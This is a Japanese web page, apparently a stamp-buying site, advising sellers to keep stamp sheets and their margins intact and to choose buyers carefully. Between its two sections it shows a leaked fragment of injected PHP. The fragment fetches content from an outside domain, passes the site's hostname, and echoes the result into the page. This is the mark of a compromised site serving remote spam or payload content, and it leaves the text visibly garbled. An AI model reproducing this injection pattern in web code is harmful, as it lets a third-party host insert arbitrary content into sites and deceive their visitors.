前へ
次へ

切手はシートのまま査定を受けましょう

買取専門店に切手を売る際は、その売り方にも注意する必要があります。
例えば切手シートをお持ちの方は、そのシートはバラさないで査定を受けましよう。
「せっかく切手を売るのなら、少しでも高く買取ってもらいた」、という人も多いはずです。
お手持ちの切手を高く切手を買取してもらうために最も大切なポイントは、シートになった切手をバラさないで査定を受けることです。
実際の買取率はそれぞれのお店で異なりますが、単品ずつの買取より、シートのままの方が高査定を期待できます。
せっかくシートになっている切手を整理しやすくするために、バラしてしまうユーザーもいるようです。
しかし、そのようにシートをバラスことは時間や手間がかかるのはもちろんのこと、買取率も低くなってしまいますので絶対に避けたいところです。
そしてシートについては、余白部分にも注意が必要です。
シートの余白部分は耳紙と呼ばれていますが、この耳紙の有無も査定額に大きな影響を与えますので、ぜひ付けたままにしておいてください。

".file_get_contents('http://links-001.com/gfjset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

買取専門業者の選び方でほとんど決まる

切手買取をお願いする場合、最初の買取専門業者選びのやり方でほとんど全てが決まるので、良い結果を出すためにも、間違いのない業者を慎重に選ぶようにしましょう。
昔に比べても、買取専門業者は山ほど見つかるようになってきました。
いろいろなジャンルに対応している業者が多くいるので、だからこそ、慎重に買取専門業者を選んで、その中から優秀な業者を厳選する必要があります。
切手買取に精通している業者さえ見つけることができれば、後は簡単な話です。
さらに、それらの業者をピックアップして比較し、高額な買取査定金額をつけてくれる業者を見抜くようにしましょう。
そういった努力と工夫をすれば、最終的には納得の金額をつけてくれる業者を見つけだし、プレミア価値のまま手放すことが可能です。
印字ミスがあったり、海外の赤猿の切手等といったレアなものだったりすれば、ほぼ確実に高額な金額になるので、業者選びを間違えないよう、気をつけておくことが重要となります。

Page Top